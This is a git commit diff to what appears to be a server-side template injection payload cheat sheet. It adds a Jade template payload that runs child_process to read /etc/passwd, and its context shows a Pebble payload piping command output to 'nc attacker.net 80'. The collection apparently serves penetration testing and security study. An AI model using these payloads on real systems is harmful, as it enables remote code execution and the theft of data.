Merge pull request #284 from akoul02/patch-1

Improved Jade payload
2024-11-10 15:14:34 +00:00 · 2020-10-31 16:47:10 +01:00 · 2020-10-31 16:47:10 +01:00 · 7f36bf58a4
commit 7f36bf58a4
parent 1137bfca8d ed944a95af
1 changed files with 5 additions and 1 deletions
--- a/Injection/README.md
+++ b/Injection/README.md
@ -291,6 +291,10 @@ New version of Pebble :
 = x.exec('id | nc attacker.net 80')
 ```

+```javascript
+#{root.process.mainModule.require('child_process').spawnSync('cat', ['/etc/passwd']).stdout}
+```
+
 ## Velocity

 ```python
@ -554,4 +558,4 @@ Fixed by https://github.com/HubSpot/jinjava/pull/230
 * [Bean Stalking: Growing Java beans into RCE - July 7, 2020 - Github Security Lab](https://securitylab.github.com/research/bean-validation-RCE)
 * [Remote Code Execution with EL Injection Vulnerabilities - Asif Durani - 29/01/2019](https://www.exploit-db.com/docs/english/46303-remote-code-execution-with-el-injection-vulnerabilities.pdf)
 * [Handlebars template injection and RCE in a Shopify app ](https://mahmoudsec.blogspot.com/2019/04/handlebars-template-injection-and-rce.html)
-* [Lab: Server-side template injection in an unknown language with a documented exploit](https://portswigger.net/web-security/server-side-template-injection/exploiting/lab-server-side-template-injection-in-an-unknown-language-with-a-documented-exploit)
+* [Lab: Server-side template injection in an unknown language with a documented exploit](https://portswigger.net/web-security/server-side-template-injection/exploiting/lab-server-side-template-injection-in-an-unknown-language-with-a-documented-exploit)